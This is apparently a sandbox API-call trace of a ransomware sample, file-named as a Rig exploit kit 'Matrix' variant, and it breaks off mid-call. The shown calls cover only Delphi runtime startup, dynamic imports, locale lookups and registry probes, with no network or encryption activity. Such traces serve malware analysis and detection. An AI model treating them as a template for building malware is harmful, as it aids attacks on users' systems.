0x76c2e127 [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0090.858] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0090.858] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0090.858] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0090.858] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0090.858] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0090.859] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0090.859] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0090.859] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0090.859] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0090.859] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0090.859] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0090.859] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0090.859] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0090.859] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0090.859] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0090.859] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0090.859] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0090.859] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0090.859] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0090.859] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0090.859] SetThreadLocale (Locale=0x400) returned 1 [0090.867] GetVersion () returned 0x1db10106 [0090.867] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0090.867] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0090.867] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0090.867] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0090.867] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0090.867] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0090.867] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.867] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " [0090.867] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0090.867] GetACP () returned 0x4e4 [0090.867] GetCurrentThreadId () returned 0xa8c [0090.867] GetVersion () returned 0x1db10106 [0090.867] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x2f1c78, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.868] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe" (normalized: "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe")) returned 0x57 [0090.868] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe" (normalized: "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe")) returned 0x57 [0090.868] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1300000 [0090.868] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0090.868] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0090.868] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0090.868] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0090.868] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0090.868] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0090.868] GetUserDefaultUILanguage () returned 0x409 [0090.869] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0090.869] GetThreadUILanguage () returned 0x120409 [0090.869] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0090.869] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x14319b0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x14319b0, pcchLanguagesBuffer=0x12d768) returned 1 [0090.870] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0090.870] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0090.870] GetUserDefaultUILanguage () returned 0x409 [0090.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0090.870] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0090.870] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0090.870] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0090.871] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.871] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0090.872] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x304400 [0090.872] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0090.872] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.872] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0090.872] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0090.872] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0090.872] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0090.872] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0090.872] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0090.872] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0090.872] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0090.872] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0090.872] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.872] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0090.872] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0090.872] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x13f80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0090.872] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0090.872] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe" (normalized: "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe")) returned 0x57 [0090.872] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0090.872] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0090.872] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0090.872] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0090.872] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0090.872] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0090.872] GetThreadLocale () returned 0x409 [0090.872] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0090.872] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0090.873] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0090.873] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0090.873] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0090.873] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x304410 [0090.873] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0090.873] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0090.873] GetLastError () returned 0x7a [0090.873] GetLogicalProcessorInformation (in: Buffer=0x13e99d0, ReturnedLength=0x12fab0 | out: Buffer=0x13e99d0, ReturnedLength=0x12fab0) returned 1 [0090.873] GetCurrentThreadId () returned 0xa8c [0090.873] GetCurrentThreadId () returned 0xa8c [0090.873] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0090.873] GetThreadLocale () returned 0x409 [0090.873] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0090.874] GetThreadLocale () returned 0x409 [0090.874] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0090.874] GetCurrentThreadId () returned 0xa8c [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0090.875] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0090.875] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0090.875] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0090.875] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0090.875] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0090.875] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0090.875] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0090.875] GetLocaleInfoW (in: Locale=0x409, 